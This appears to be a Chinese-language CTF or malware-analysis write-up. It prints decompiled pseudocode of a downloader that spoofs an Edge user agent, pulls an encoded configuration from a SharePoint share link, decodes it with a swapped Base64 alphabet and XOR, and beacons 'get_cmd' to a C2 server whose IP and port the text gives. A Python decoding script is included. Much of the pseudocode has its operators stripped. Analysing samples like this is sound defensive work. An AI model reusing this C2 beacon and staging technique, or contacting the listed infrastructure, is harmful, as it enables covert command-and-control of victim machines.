__int64 v58; // [esp280h] [ebp-2Ch] BYREF int v59; // [esp288h] [ebp-24h] int *v60; // [esp290h] [ebp-1Ch] struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; // [esp294h] [ebp-18h] void *v62; // [esp298h] [ebp-14h] int v63; // [esp29Ch] [ebp-10h] int v64; // [esp2A0h] [ebp-Ch] void *v65; // [esp2A4h] [ebp-8h] int v66; // [esp2A8h] [ebp-4h] BYREF void *retaddr; // [esp2ACh] [ebp0h] v64 a1; v65 retaddr; v63 -1; v62 loc_41B9C4; ExceptionList NtCurrentTeb()-NtTib.ExceptionList; v60 v66; hSession WinHttpOpen( LMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/ 537.36 Edg/142.0.0.0, 0, 0, 0, 0); hConnect WinHttpConnect(hSession, Lcolonised-my.sharepoint.com, 0x1BBu, 0); hRequest WinHttpOpenRequest( hConnect, LGET, L/personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?shareEQsrTSD_4ehGvYTXbmU5zR0B0lk 4L-x0r8yGztFlye2j9Q, 0, 0, 0, 0x800000u); hRequest_1 hRequest; v2 WinHttpSendRequest(hRequest, 0, 0, 0, 0, 0, 0); if ( v2 ) v2 WinHttpReceiveResponse(hRequest, 0); v53 0; v52 0; n15 15; LOBYTE(v52) 0; v63 0; if ( v2 ) { lpdwNumberOfBytesAvailable_ 0; do { WinHttpQueryDataAvailable(hRequest, lpdwNumberOfBytesAvailable_); if ( !lpdwNumberOfBytesAvailable_ ) break; lpBuffer (char *)sub_4066F6(lpdwNumberOfBytesAvailable_ 1); lpBuffer_1 lpBuffer; sub_407F20(lpBuffer, 0, lpdwNumberOfBytesAvailable_ 1); lpdwNumberOfBytesRead_ 0; if ( WinHttpReadData(hRequest, lpBuffer, lpdwNumberOfBytesAvailable_, lpdwNumberOfBytesRead_) ) { v4 strlen(lpBuffer); if ( v4 n15 - v53 ) { LOBYTE(v38) 0; sub_404BF0(v4, v38, lpBuffer, v4); } else { v5 v52; if ( n15 0xF ) v5 (__int128 *)v52; v6 (char *)v5 v53; v53 v4; sub_4079A0(v6, lpBuffer_1, v4); v6[v4] 0; lpBuffer lpBuffer_1; } hRequest hRequest_1; } sub_406260(lpBuffer); } while ( lpdwNumberOfBytesAvailable_ ); } WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); v33 0; n0xF_4 0; v32 0; sub_4046D0(lD1bZ0, 6); LOBYTE(v63) 1; v36 0; v35 0; n0xF_3 0; sub_4046D0(E9dE7d, 6); LOBYTE(v63) 2; sub_402080(v35, v32); LOBYTE(v63) 3; v7 sub_401D80(); LOBYTE(v63) 4; sub_403280(v7); for ( i 0; i v49; i ) { v9 v48; if ( n0xF 0xF ) v9 v48; *((_BYTE *)v9 i) ^ 1u; } LOBYTE(v63) 6; if ( n0xF_1 0xF ) { v10 v30; if ( n0xF_1 1 0x1000 ) { v10 (_BYTE *)*((_DWORD *)v30 - 1); v11 n0xF_1 36; if ( (unsigned int)(v30 - v10 - 4) 0x1F ) goto LABEL_71; } sub_4066E8(v10); } LOBYTE(v63) 7; if ( n0xF_2 0xF ) { v12 v28; if ( n0xF_2 1 0x1000 ) { v12 (_BYTE *)*((_DWORD *)v28 - 1); v11 n0xF_2 36; if ( (unsigned int)(v28 - v12 - 4) 0x1F ) goto LABEL_71; } sub_4066E8(v12); } LOBYTE(v63) 8; if ( n0xF_3 0xF ) { v13 (void *)v35; if ( n0xF_3 1 0x1000 ) { v13 *(void **)(v35 - 4); v11 n0xF_3 36; if ( (unsigned int)(v35 - (_DWORD)v13 - 4) 0x1F ) goto LABEL_71; } sub_4066E8(v13); } v36 0; n0xF_3 15; LOBYTE(v35) 0; LOBYTE(v63) 9; n0xF_5 n0xF_4; if ( n0xF_4 0xF ) goto LABEL_34; v15 (void *)v32; if ( n0xF_4 1 0x1000 ) { v15 *(void **)(v32 - 4); v11 n0xF_4 36; if ( (unsigned int)(v32 - (_DWORD)v15 - 4) 0x1F ) { LABEL_71: sub_40AEAF(v11, 0, 0, 0, 0, 0); goto LABEL_72; } } sub_4066E8(v15); LABEL_34: v33 0; n0xF_4 15; LOBYTE(v32) 0; v58 0; v59 0; sub_4021D0(n0xF_5); LOBYTE(v63) 10; if ( (unsigned int)(HIDWORD(v58) - v58 - 48) 0x18 ) { v16 1; goto LABEL_54; } sub_403280(v58); LOBYTE(v63) 11; hSession_1 (_DWORD *)(v58 24); v18 (_DWORD *)sub_40B29E(); if ( hSession_1[5] 0xFu ) hSession_1 (_DWORD *)*hSession_1; *v18 0; hConnect (HINTERNET)sub_40BC9D(hSession_1, hSession, 10); if ( hSession_1 hSession ) LABEL_72: sub_40581D(invalid stoi argument); if ( *v18 34 ) sub_40585D(stoi argument out of range); if ( WSAStartup(0x202u, lpWSAData_) 0 ) { s socket(2, 1, 0); if ( s 0 ) { name_ 0; name_.sa_family 2; *(_WORD *)name_.sa_data htons((u_short)hConnect); pszAddrString (const CHAR *)v46; if ( n0xF_6 0xF ) pszAddrString (const CHAR *)v46[0]; if ( inet_pton(2, pszAddrString, name_.sa_data[2]) 0 ) { if ( connect(s, name_, 16) 0 ) { len 0; n0xF_7 0; buf_1 0; sub_4046D0(get_cmd, 7); buf (const char *)buf_1; if ( n0xF_7 0xF ) buf (const char *)buf_1; send(s, buf, len, 0); closesocket(s); WSACleanup(); v16 0; if ( n0xF_7 0xF ) { buf_2 (void *)buf_1; if ( n0xF_7 1 0x1000 ) { buf_2 *(void **)(buf_1 - 4); v22 n0xF_7 36; if ( (unsigned int)(buf_1 - (_DWORD)buf_2 - 4) 0x1F ) goto LABEL_74; } sub_4066E8(buf_2); } len 0; n0xF_7 15; LOBYTE(buf_1) 0; goto LABEL_49; } closesocket(s); } WSACleanup(); } } v16 1; LABEL_49: if ( n0xF_6 0xF ) { v21 (void *)v46[0]; if ( n0xF_6 1 0x1000 ) { v21 *(void **)(v46[0] - 4); v22 n0xF_6 36; if ( (unsigned int)(v46[0] - (_DWORD)v21 - 4) 0x1F ) goto LABEL_74; } sub_4066E8(v21); } v46[4] 0; n0xF_6 15; LOBYTE(v46[0]) 0; LABEL_54: sub_403180(v58); if ( n0xF 0xF ) { v23 v48; if ( n0xF 1 0x1000 ) { v23 (_BYTE *)*(v48 - 1); v22 n0xF 36; if ( (unsigned int)((char *)v48 - v23 - 4) 0x1F ) goto LABEL_74; } sub_4066E8(v23); } v49 0; n0xF 15; LOBYTE(v48) 0; if ( n15 0xF ) { v24 (void *)v52; if ( n15 1 0x1000 || (v24 *(void **)(v52 - 4), v22 n15 36, (unsigned int)(v52 - (_DWORD)v24 - 4) 0x1F) ) { sub_4066E8(v24); return v16; } LABEL_74: sub_40AEAF(v22, 0, 0, 0, 0, 0); JUMPOUT(0x402B4C); } return v16; }sub_402450先伪装浏览器 UA通过 WinHTTP 访问colonised-my.sharepoint.com的 SharePoint 共享下载链接获取一段包含配置的文本随后以lD1bZ0与E9dE7d作为分隔标记提取中间字段并对字段逐字节执行 XOR解混淆得到明文的 C2 IP 与端口端口通过 stoi 转换最后初始化 Winsock建立 TCP 连接并发送固定字符串get_cmd以向 C2 请求指令3.1 首次回连hSession WinHttpOpen(LEdg/142.0.0.0, ...); hConnect WinHttpConnect(hSession, Lcolonised-my.sharepoint.com, 443, 0); hRequest WinHttpOpenRequest(hConnect, LGET, L/personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?share..., ...);域名colonised-my.sharepoint.comUser-Agent伪装为Edge浏览器3.2 获取C2配置从服务器下载的数据包中包含加密的C2地址先手动访问一下colonised-my.sharepoint.com//personal/f00001111_colonised_onmicrosoft_com/_layouts/52/download.aspx?shareEQsrTSD_4ehGvYTXbmU5zR0B0lk4L-x0r8yGztFlye2j9Q有个c2.datoA0tG3aW2vT8mL5tvM1qV3cF2aB2xS6ztT7gX0zB1xR9zK8mjP0xP2iT3lO6fH1rpE4gP6pA2mE9dE7dntyVmZqZlZm5lZy5Fti2mZe1lD1bZ0nJ8gY7lR2qmP3vK5nY1hD3cT7guJ8tQ8rE6qJ1gF6ipZ0rF0vR5yB4xA4nyD7wM0lV5wC4rZ1c中间E9dE7d ntyVmZqZlZm5lZy5Fti2mZe1 lD1bZ0get请求判断内容包不包含lD1bZ0和E9dE7dshellcodel在D1bZ0和E9dE7d也就是需要解码的部分ntyVmZqZlZn5lZy5Fti2mZe13.3 自定义Base64和xor解密解码_DWORD *__fastcall sub_401D80(_DWORD *a1, _DWORD *a2) { _DWORD *v2; // edi int v3; // eax unsigned int n0xF; // ecx _DWORD *v5; // eax int n4_1; // esi _DWORD *v7; // eax _DWORD *v8; // eax int n4; // edi int *v10; // ecx char v11; // al char *v12; // esi char *v13; // eax int n3; // esi unsigned int n0xF_2; // ecx unsigned int n0xF_1; // edx _DWORD *v17; // eax char *v18; // eax int n4_2; // eax bool v20; // cf int n4_3; // edi int *v22; // ecx char v23; // al char *v24; // esi char *v25; // eax int v26; // esi unsigned int n0xF_4; // ecx unsigned int n0xF_3; // edx _DWORD *v29; // eax char *v30; // eax int v32; // [esp10h] [ebp-3Ch] _DWORD *v33; // [esp18h] [ebp-34h] char v34; // [esp1Ch] [ebp-30h] int v35; // [esp20h] [ebp-2Ch] int v36; // [esp24h] [ebp-28h] char v37; // [esp24h] [ebp-28h] char v39; // [esp28h] [ebp-24h] int v40; // [esp2Ch] [ebp-20h] int n4_4; // [esp30h] [ebp-1Ch] char v42; // [esp30h] [ebp-1Ch] unsigned __int8 n43; // [esp37h] [ebp-15h] char v44; // [esp38h] [ebp-14h] char i; // [esp39h] [ebp-13h] char v46; // [esp3Ah] [ebp-12h] char v47; // [esp3Ch] [ebp-10h] unsigned __int8 v48; // [esp3Dh] [ebp-Fh] unsigned __int8 v49; // [esp3Eh] [ebp-Eh] char v50; // [esp3Fh] [ebp-Dh] int v51; // [esp48h] [ebp-4h] v33 a2; v2 a1; v3 a2[4]; *(_OWORD *)a1 0; a1[4] 0; a1[5] 15; n4_4 0; v35 0; *(_BYTE *)a1 0; v51 0; if ( v3 ) { do { n0xF a2[5]; v40 v3 - 1; v5 a2; if ( n0xF 0xF ) v5 (_DWORD *)*a2; n4_1 n4_4; if ( *((_BYTE *)v5 v35) 61 ) break; v7 a2; if ( n0xF 0xF ) v7 (_DWORD *)*a2; n43 *((_BYTE *)v7 v35); if ( !sub_40AFC0(n43) n43 ! 43 n43 ! 47 ) break; a2 v33; v8 v33; if ( v33[5] 0xFu ) v8 (_DWORD *)*v33; *(v47 n4_4) *((_BYTE *)v8 v35); n4_1 n4_4 1; n4_4 n4_1; v35; if ( n4_1 4 ) { for ( n4 0; n4 4; n4 ) { v10 dword_42ABC4; if ( (unsigned int)::n0xF 0xF ) v10 (int *)dword_42ABC4; v42 (char)v10; if ( dword_42ABD4 ) { v12 (char *)v10 dword_42ABD4; LOBYTE(v32) *(v47 n4); v13 (char *)sub_405610(v10, (char *)v10 dword_42ABD4, v32); if ( v13 v12 ) v11 -1; else v11 (_BYTE)v13 - v42; } else { v11 -1; } *(v47 n4) v11; } v2 a1; v44 4 * v47 ((v48 4) 3); v46 v50 (v49 6); n3 0; i 16 * v48 ((v49 2) 0xF); do { n0xF_2 a1[4]; n0xF_1 a1[5]; v34 *(v44 n3); if ( n0xF_2 n0xF_1 ) { LOBYTE(v36) 0; sub_404AA0(1, v36, v34); } else { a1[4] n0xF_2 1; v17 a1; if ( n0xF_1 0xF ) v17 (_DWORD *)*a1; v18 (char *)v17 n0xF_2; v18[1] 0; *v18 v34; } n3; } while ( n3 3 ); a2 v33; n4_1 0; n4_4 0; } v3 v40; } while ( v40 ); if ( n4_1 ) { n4_2 n4_1; if ( n4_1 4 ) { v20 (unsigned int)n4_1 4; do { if ( !v20 ) { sub_406388(); JUMPOUT(0x402074); } *(v47 n4_2) 0; v20 (unsigned int)n4_2 4; } while ( n4_2 4 ); } for ( n4_3 0; n4_3 4; n4_3 ) { v22 dword_42ABC4; if ( (unsigned int)::n0xF 0xF ) v22 (int *)dword_42ABC4; v37 (char)v22; if ( dword_42ABD4 ) { v24 (char *)v22 dword_42ABD4; LOBYTE(v40) *(v47 n4_3); v25 (char *)sub_405610(v22, (char *)v22 dword_42ABD4, v40); if ( v25 v24 ) v23 -1; else v23 (_BYTE)v25 - v37; } else { v23 -1; } *(v47 n4_3) v23; } v26 0; v2 a1; v44 4 * v47 ((v48 4) 3); v46 v50 (v49 6); for ( i 16 * v48 ((v49 2) 0xF); v26 n4_4 - 1; v26 ) { n0xF_4 v2[4]; n0xF_3 v2[5]; v39 *(v44 v26); if ( n0xF_4 n0xF_3 ) { LOBYTE(v40) 0; sub_404AA0(1, v40, v39); } else { v2[4] n0xF_4 1; v29 v2; if ( n0xF_3 0xF ) v29 (_DWORD *)*v2; v30 (char *)v29 n0xF_4; v30[1] 0; *v30 v39; } } } } return v2; }base64换表了int sub_401000() { sub_4046D0(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/, 64); return sub_4066D3(sub_41BD10); }脚本import base64 custom_b64 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/ std_b64 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/ def custom_b64_to_std(s: str) - str: 把用自定义表编码的 Base64 串转换成标准 Base64 串 table {c: std_b64[custom_b64.index(c)] for c in custom_b64} return .join(table[c] for c in s) def decode_custom_b64_xor1(s: str) - bytes: std_str custom_b64_to_std(s) raw base64.b64decode(std_str) return bytes(b ^ 1 for b in raw) if __name__ __main__: s ntyVmZqZlZm5lZy5Fti2mZe1 out decode_custom_b64_xor1(s) print(out) print(out.decode(ascii)) b47.252.28.78|37204 47.252.28.78|37204 C2地址47.252.28.78:372043.4 最终通信send(s, get_cmd, 7, 0); // 发送固定字符串get_cmd连接到C2服务器并发送get_cmd访问http://47.252.28.78:37204获取最终的flag偷个霍雅师傅的图